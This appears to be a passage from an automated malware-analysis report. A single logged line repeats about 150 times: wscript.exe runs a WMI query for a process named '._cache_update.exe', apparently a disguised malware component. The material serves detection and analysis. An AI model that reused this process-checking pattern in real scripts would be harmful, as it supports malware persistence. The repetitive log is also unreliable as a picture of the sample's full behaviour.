                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_update.exe'
